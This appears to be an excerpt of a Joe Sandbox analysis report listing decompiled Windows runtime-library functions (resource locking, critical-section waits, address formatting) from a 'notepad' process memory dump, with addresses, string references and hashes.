                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b722b6
                                                    0x00000000
                                                    0x00b7228f
                                                    0x00b72349
                                                    0x00b7234d
                                                    0x00b72251
                                                    0x00b72251
                                                    0x00000000
                                                    0x00b72251
                                                    0x00b721a4
                                                    0x00b721a4
                                                    0x00b721a6
                                                    0x00b721a8
                                                    0x00b721ac
                                                    0x00b721b6
                                                    0x00b721b8
                                                    0x00b721bc
                                                    0x00b721be
                                                    0x00000000
                                                    0x00000000
                                                    0x00b721c0
                                                    0x00b721c2
                                                    0x00b721c4
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b721c4
                                                    0x00b721c6
                                                    0x00b721c6
                                                    0x00b721c8
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b721c8
                                                    0x00b721a2
                                                    0x00000000
                                                    0x00b72183
                                                    0x00b5057b
                                                    0x00b5057d
                                                    0x00b50581
                                                    0x00b50583
                                                    0x00b72178
                                                    0x00000000
                                                    0x00b50589
                                                    0x00b5058f
                                                    0x00b5058f
                                                    0x00b50583
                                                    0x00000000

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B72206
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-4236105082
                                                    • Opcode ID: 30dc7a8b503ac9a6e6dc9bceb7d63e8e4afb4c06abd61b2aafe6e3c4d8877542
                                                    • Instruction ID: 342b7d80cdc4228f8a8159c3e876e297b654e4a0ed721b57127dbd3c69555a1a
                                                    • Opcode Fuzzy Hash: 30dc7a8b503ac9a6e6dc9bceb7d63e8e4afb4c06abd61b2aafe6e3c4d8877542
                                                    • Instruction Fuzzy Hash: 64512971B002016FEB149B18CCC1FA633E9EF94711F2182E9FD59EB2C6EA21EC418790
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B514C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 64%
                                                    			E00B514C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
				signed int _v8;
				char _v10;
				char _v140;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t26;
				signed int _t29;
				signed int _t34;
				signed int _t40;
				intOrPtr _t45;
				void* _t51;
				intOrPtr* _t52;
				void* _t54;
				signed int _t57;
				void* _t58;

				_t51 = __edx;
				_t24 =  *0xbf2088; // 0x74b3f05d
				_v8 = _t24 ^ _t57;
				_t45 = _a16;
				_t53 = _a4;
				_t52 = _a20;
				if(_a4 == 0 || _t52 == 0) {
					L10:
					_t26 = 0xc000000d;
				} else {
					if(_t45 == 0) {
						if( *_t52 == _t45) {
							goto L3;
						} else {
							goto L10;
						}
					} else {
						L3:
						_t28 =  &_v140;
						if(_a12 != 0) {
							_push("[");
							_push(0x41);
							_push( &_v140);
							_t29 = E00B47707();
							_t58 = _t58 + 0xc;
							_t28 = _t57 + _t29 * 2 - 0x88;
						}
						_t54 = E00B513CB(_t53, _t28);
						if(_a8 != 0) {
							_t34 = E00B47707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t34 * 2;
						}
						if(_a12 != 0) {
							_t40 = E00B47707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
							_t58 = _t58 + 0x10;
							_t54 = _t54 + _t40 * 2;
						}
						_t53 = (_t54 -  &_v140 >> 1) + 1;
						 *_t52 = _t53;
						if( *_t52 < _t53) {
							goto L10;
						} else {
							E00B12340(_t45,  &_v140, _t53 + _t53);
							_t26 = 0;
						}
					}
				}
				return E00B1E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
			}




















                                                    0x00b514c0
                                                    0x00b514cb
                                                    0x00b514d2
                                                    0x00b514d6
                                                    0x00b514da
                                                    0x00b514de
                                                    0x00b514e3
                                                    0x00b5157a
                                                    0x00b5157a
                                                    0x00b514f1
                                                    0x00b514f3
                                                    0x00b7ea0f
                                                    0x00000000
                                                    0x00b7ea15
                                                    0x00000000
                                                    0x00b7ea15
                                                    0x00b514f9
                                                    0x00b514f9
                                                    0x00b514fe
                                                    0x00b51504
                                                    0x00b7ea1a
                                                    0x00b7ea1f
                                                    0x00b7ea21
                                                    0x00b7ea22
                                                    0x00b7ea27
                                                    0x00b7ea2a
                                                    0x00b7ea2a
                                                    0x00b51515
                                                    0x00b51517
                                                    0x00b5156d
                                                    0x00b51572
                                                    0x00b51575
                                                    0x00b51575
                                                    0x00b5151e
                                                    0x00b7ea50
                                                    0x00b7ea55
                                                    0x00b7ea58
                                                    0x00b7ea58
                                                    0x00b5152e
                                                    0x00b51531
                                                    0x00b51533
                                                    0x00000000
                                                    0x00b51535
                                                    0x00b51541
                                                    0x00b51549
                                                    0x00b51549
                                                    0x00b51533
                                                    0x00b514f3
                                                    0x00b51559

                                                    APIs
                                                    • ___swprintf_l.LIBCMT ref: 00B7EA22
                                                      • Part of subcall function 00B513CB: ___swprintf_l.LIBCMT ref: 00B5146B
                                                      • Part of subcall function 00B513CB: ___swprintf_l.LIBCMT ref: 00B51490
                                                    • ___swprintf_l.LIBCMT ref: 00B5156D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: ___swprintf_l
                                                    • String ID: %%%u$]:%u
                                                    • API String ID: 48624451-3050659472
                                                    • Opcode ID: da6d95f45460e8b803f473725127419fdf25b5faefc7434d5df81292f3082721
                                                    • Instruction ID: a070edcfbb4b1963e6be78a14e79dbe3cc44c9cf8a73ed877b36405eee24525e
                                                    • Opcode Fuzzy Hash: da6d95f45460e8b803f473725127419fdf25b5faefc7434d5df81292f3082721
                                                    • Instruction Fuzzy Hash: 04217F72900219ABCB219E58D841BEA73ECEB64701F8449E5EC56A3140EB70EA588BE1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B353A5 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 185COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 45%
                                                    			E00B353A5(signed int _a4, char _a8) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t32;
				signed int _t37;
				signed int _t40;
				signed int _t42;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				signed int _t49;
				void* _t51;
				signed int _t57;
				signed int _t64;
				signed int _t71;
				void* _t74;
				intOrPtr _t78;
				signed int* _t79;
				void* _t85;
				signed int _t86;
				signed int _t92;
				void* _t104;
				void* _t105;

				_t64 = _a4;
				_t32 =  *(_t64 + 0x28);
				_t71 = _t64 + 0x28;
				_push(_t92);
				if(_t32 < 0) {
					_t78 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
						goto L3;
					} else {
						__eflags = _t32 | 0xffffffff;
						asm("lock xadd [ecx], eax");
						return 1;
					}
				} else {
					L3:
					_push(_t86);
					while(1) {
						L4:
						__eflags = _t32;
						if(_t32 == 0) {
							break;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							__eflags = 0;
							return 0;
						} else {
							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
							_t79 = _t64 + 0x24;
							_t71 = 1;
							asm("lock xadd [eax], ecx");
							_t32 =  *(_t64 + 0x28);
							_a4 = _t32;
							__eflags = _t32;
							if(_t32 != 0) {
								L19:
								_t86 = 0;
								__eflags = 0;
								while(1) {
									_t81 =  *(_t64 + 0x30) & 0x00000001;
									asm("sbb esi, esi");
									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00bf01c0;
									_push(_t92);
									_push(0);
									_t37 = E00B0F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = L00B54FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									L00B63F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									L00B63F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00B9217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									L00B63F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00B53915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00B35384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E00B0F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00B53915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E00B0F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00B53915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E00B0F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00B53915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L38;
													}
													E00B35329(_t74, _t92);
													_push(1);
													_t48 = E00B353A5(_t92);
													return _t48;
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L38;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L38:
			}


























                                                    0x00b353ab
                                                    0x00b353ae
                                                    0x00b353b1
                                                    0x00b353b4
                                                    0x00b353b7
                                                    0x00b505b6
                                                    0x00b505c0
                                                    0x00b505c3
                                                    0x00000000
                                                    0x00b505c9
                                                    0x00b505c9
                                                    0x00b505cc
                                                    0x00b505d5
                                                    0x00b505d5
                                                    0x00b353bd
                                                    0x00b353bd
                                                    0x00b353bd
                                                    0x00b353be
                                                    0x00b353be
                                                    0x00b353be
                                                    0x00b353c0
                                                    0x00000000
                                                    0x00000000
                                                    0x00b72269
                                                    0x00b7226d
                                                    0x00b72349
                                                    0x00b7234d
                                                    0x00b72273
                                                    0x00b72276
                                                    0x00b72279
                                                    0x00b7227e
                                                    0x00b72283
                                                    0x00b72287
                                                    0x00b7228a
                                                    0x00b7228d
                                                    0x00b7228f
                                                    0x00b722bc
                                                    0x00b722bc
                                                    0x00b722bc
                                                    0x00b722be
                                                    0x00b722c4
                                                    0x00b722cc
                                                    0x00b722d0
                                                    0x00b722d6
                                                    0x00b722d7
                                                    0x00b722da
                                                    0x00b722df
                                                    0x00b722e4
                                                    0x00000000
                                                    0x00000000
                                                    0x00b722e6
                                                    0x00b722e9
                                                    0x00b722f4
                                                    0x00b722f9
                                                    0x00b722fa
                                                    0x00b72305
                                                    0x00b72314
                                                    0x00b72319
                                                    0x00b7231a
                                                    0x00b7231d
                                                    0x00b72320
                                                    0x00b72323
                                                    0x00b72323
                                                    0x00b72328
                                                    0x00b7232d
                                                    0x00b7232f
                                                    0x00b72331
                                                    0x00b72336
                                                    0x00b72336
                                                    0x00b7233b
                                                    0x00b7233d
                                                    0x00b72350
                                                    0x00b72351
                                                    0x00b72356
                                                    0x00b72359
                                                    0x00b72359
                                                    0x00b7235b
                                                    0x00b7235d
                                                    0x00b35367
                                                    0x00b3536b
                                                    0x00b35372
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b72363
                                                    0x00b72363
                                                    0x00b72369
                                                    0x00b7236a
                                                    0x00b7236c
                                                    0x00b72371
                                                    0x00b72373
                                                    0x00000000
                                                    0x00b72379
                                                    0x00b72379
                                                    0x00b7237a
                                                    0x00b7237f
                                                    0x00b7237f
                                                    0x00b72385
                                                    0x00b72386
                                                    0x00b72389
                                                    0x00b7238e
                                                    0x00b72390
                                                    0x00b35378
                                                    0x00b3537c
                                                    0x00b72396
                                                    0x00b72396
                                                    0x00b72397
                                                    0x00b7239c
                                                    0x00b723a2
                                                    0x00b723a3
                                                    0x00b723a6
                                                    0x00b723ab
                                                    0x00b723ad
                                                    0x00000000
                                                    0x00b723b3
                                                    0x00b723b3
                                                    0x00b723b4
                                                    0x00b723b9
                                                    0x00b723ba
                                                    0x00b723ba
                                                    0x00b723bc
                                                    0x00b723bf
                                                    0x00000000
                                                    0x00000000
                                                    0x00b69153
                                                    0x00b69158
                                                    0x00b6915a
                                                    0x00b6915e
                                                    0x00b69160
                                                    0x00000000
                                                    0x00b69166
                                                    0x00b69166
                                                    0x00b69171
                                                    0x00b69176
                                                    0x00b69176
                                                    0x00000000
                                                    0x00b69160
                                                    0x00b723c6
                                                    0x00b723cb
                                                    0x00b723ce
                                                    0x00b723d7
                                                    0x00b723d7
                                                    0x00b723ad
                                                    0x00b72390
                                                    0x00b72373
                                                    0x00b7233f
                                                    0x00b7233f
                                                    0x00000000
                                                    0x00b7233f
                                                    0x00b72291
                                                    0x00b72291
                                                    0x00b72293
                                                    0x00b72295
                                                    0x00b7229a
                                                    0x00b722a1
                                                    0x00b722a3
                                                    0x00b722a7
                                                    0x00b722a9
                                                    0x00000000
                                                    0x00000000
                                                    0x00b722ab
                                                    0x00b722ad
                                                    0x00b722af
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b722af
                                                    0x00b722b1
                                                    0x00b722b4
                                                    0x00b722b4
                                                    0x00b722b6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00b722b6
                                                    0x00b7228f
                                                    0x00000000
                                                    0x00b7226d
                                                    0x00b353cb
                                                    0x00b353ce
                                                    0x00b353d0
                                                    0x00b353d4
                                                    0x00b353d6
                                                    0x00000000
                                                    0x00b353d8
                                                    0x00b353e3
                                                    0x00b353ea
                                                    0x00b353ea
                                                    0x00b353d6
                                                    0x00000000

                                                    APIs
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B722F4
                                                    Strings
                                                    • RTL: Re-Waiting, xrefs: 00B72328
                                                    • RTL: Resource at %p, xrefs: 00B7230B
                                                    • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00B722FC
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041475672.0000000000BF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041557208.0000000000BF4000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041650076.0000000000BF7000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041688859.0000000000C00000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1042103449.0000000000C60000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_9_2_af0000_notepad.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                    • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                    • API String ID: 885266447-871070163
                                                    • Opcode ID: f3bb2d713230d7299c155d975a099bee1012bad1f5eb7dd3b2d6b4266d5c8e18
                                                    • Instruction ID: c9631f6723fa05ebe37def8d7ffcc230353ff0b63a7689a9daa7c4ad1b597562
                                                    • Opcode Fuzzy Hash: f3bb2d713230d7299c155d975a099bee1012bad1f5eb7dd3b2d6b4266d5c8e18
                                                    • Instruction Fuzzy Hash: 6B5128717007056BDB20DB28CC81FA673E8EF54760F2182E9FD59DB282EA71ED4187A4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00B3EC56 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 51%
                                                    			E00B3EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00B2DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xbf793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00B116C0(_t39);
				} else {
					_t40 = E00B0F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00B53915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00B101A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xbf793c; // 0x0
								_push(_t85);
								_t44 = L00B11F28(_t71);
							} else {
								_t44 = E00B0F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00B53915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00B92306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00B3EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = L00B54FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							L00B63F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							L00B63F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xbf20c0;
								if(_t85 != 0xbf20c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00B9217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							L00B63F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                    0x00b3ec56
                                                    0x00b3ec56
                                                    0x00b3ec56
                                                    0x00b3ec5c
                                                    0x00b3ec64
                                                    0x00b723e6
                                                    0x00b723eb
                                                    0x00b723eb
                                                    0x00b3ec6a
                                                    0x00b3ec6c
                                                    0x00b3ec6f
                                                    0x00b723f3
                                                    0x00b723f8
                                                    0x00b723fa
                                                    0x00b723fc
                                                    0x00b3ec75
                                                    0x00b3ec76
                                                    0x00b3ec76
                                                    0x00b3ec7b
                                                    0x00b3ec7c
                                                    0x00b3ec7e
                                                    0x00b72406
                                                    0x00b72407
                                                    0x00b7240c
                                                    0x00b7240d
                                                    0x00b7240d
                                                    0x00b7240d
                                                    0x00b72414
                                                    0x00b72417
                                                    0x00b7241e
                                                    0x00b72435
                                                    0x00b72438
                                                    0x00b7243c
                                                    0x00b7243f
                                                    0x00b72442
                                                    0x00b72443
                                                    0x00b72446
                                                    0x00b72449
                                                    0x00b72453
                                                    0x00b72455
                                                    0x00b7245b
                                                    0x00b7245b
                                                    0x00b3eb99
                                                    0x00b3eb99
                                                    0x00b3eb9c
                                                    0x00b3eb9d
                                                    0x00b3eb9f
                                                    0x00b3eba2
                                                    0x00b72465
                                                    0x00b7246b
                                                    0x00b7246d
                                                    0x00b3eba8
                                                    0x00b3eba9
                                                    0x00b3eba9
                                                    0x00b3ebae
                                                    0x00b3ebb3
                                                    0x00b3ebb9
                                                    0x00b3ebbb
                                                    0x00b72513
                                                    0x00b72514
                                                    0x00b72519
                                                    0x00b7251b
                                                    0x00b3ec2a
                                                    0x00b3ec2d
                                                    0x00b3ec33
                                                    0x00b3ec36
                                                    0x00b3ec3a
                                                    0x00b3ec3e
                                                    0x00b3ec40
                                                    0x00b3ec47
                                                    0x00b3ec47
                                                    0x00b3ec40
                                                    0x00b122c6
                                                    0x00b3ebc1
                                                    0x00b3ebc1
                                                    0x00b3ebc5
                                                    0x00b3ec9a
                                                    0x00b3ec9a
                                                    0x00b3ebd6
                                                    0x00b3ebd6
                                                    0x00000000
                                                    0x00b3ebbb
                                                    0x00b72477
                                                    0x00b7247c
                                                    0x00b72486
                                                    0x00b7248b
                                                    0x00b72496
                                                    0x00b7249b
                                                    0x00b7249d
                                                    0x00b724a0
                                                    0x00b724a3
                                                    0x00b724aa
                                                    0x00b724aa
                                                    0x00b724a5
                                                    0x00b724a5
                                                    0x00b724a5
                                                    0x00b724ac
                                                    0x00b724af
                                                    0x00b724b0
                                                    0x00b724b3
                                                    0x00b724b9
                                                    0x00b724ba
                                                    0x00b724bb
                                                    0x00b724c6
                                                    0x00b724cb
                                                    0x00b724cd
                                                    0x00b724d0
                                                    0x00b724d1
                                                    0x00b724d4
                                                    0x00b724d6
                                                    0x00b724d9
                                                    0x00b724d9
                                                    0x00b724dc
                                                    0x00b724df
                                                    0x00b724e1
                                                    0x00b724e7
                                                    0x00b724e9
                                                    0x00b724ec
                                                    0x00b724ef
                                                    0x00b724f2
                                                    0x00b724f2
                                                    0x00b724ef
                                                    0x00b724e7
                                                    0x00b724fa
                                                    0x00b724ff
                                                    0x00b72501
                                                    0x00b72503
                                                    0x00b72506
                                                    0x00b7250b
                                                    0x00b3eb8c
                                                    0x00b3eb93
                                                    0x00000000
                                                    0x00000000
                                                    0x00b3eb93
                                                    0x00000000
                                                    0x00b3eb99
                                                    0x00b3ec85
                                                    0x00b3ec85
                                                    0x00b3ec85
                                                    0x00000000

                                                    Strings
                                                    • RTL: Re-Waiting, xrefs: 00B724FA
                                                    • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00B724BD
                                                    • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00B7248D
                                                    Memory Dump Source
                                                    • Source File: 00000009.00000002.1040434132.0000000000B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AF0000, based on PE: true
                                                    • Associated: 00000009.00000002.1040420400.0000000000AF0000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                    • Associated: 00000009.00000002.1041429100.0000000000BE0000.00000040.00000800.00020000.00000000.sdmpDownload File
